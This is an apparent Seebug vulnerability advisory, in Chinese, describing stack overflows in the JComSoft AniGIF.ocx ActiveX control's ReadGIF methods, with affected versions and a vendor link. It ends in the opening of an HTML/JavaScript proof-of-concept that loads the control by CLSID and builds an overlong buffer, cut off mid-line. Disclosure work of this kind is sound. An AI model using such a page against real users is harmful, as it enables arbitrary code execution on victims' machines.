JComSoft AniGIF.ocx ActiveX控件多个栈溢出漏洞

2008-08-13T00:00:00
ID SSV:3826
Type seebug
Reporter Root
Modified 2008-08-13T00:00:00

Description

BUGTRAQ ID: 30621

Animation GIF ActiveX控件(anigif.ocx)用于在OLE容器中显示GIF文件。

anigif.ocx控件没有正确地验证对ReadGIF和ReadGIF2方式所传送的输入参数,如果用户受骗访问了恶意网页并向上述方式传送了超长参数的话,就可以触发栈溢出,导致执行任意指令。

JComSoft Animation GIF ActiveX 2.4.7 JComSoft Animation GIF ActiveX 1.12b JComSoft Animation GIF ActiveX 1.12a JComSoft


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.jcomsoft.com/anigif.htm target=_blank>http://www.jcomsoft.com/anigif.htm</a>

                                        
                                            
                                                &lt;html&gt;
&lt;body&gt;
&lt;object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' /&gt;
&lt;/object&gt;
&lt;script language=javascript&gt;

var buf;
for (var i=0; i&lt;259; i++) buf += &quot;X&quot;;

buf +=&quot;BBBB&quo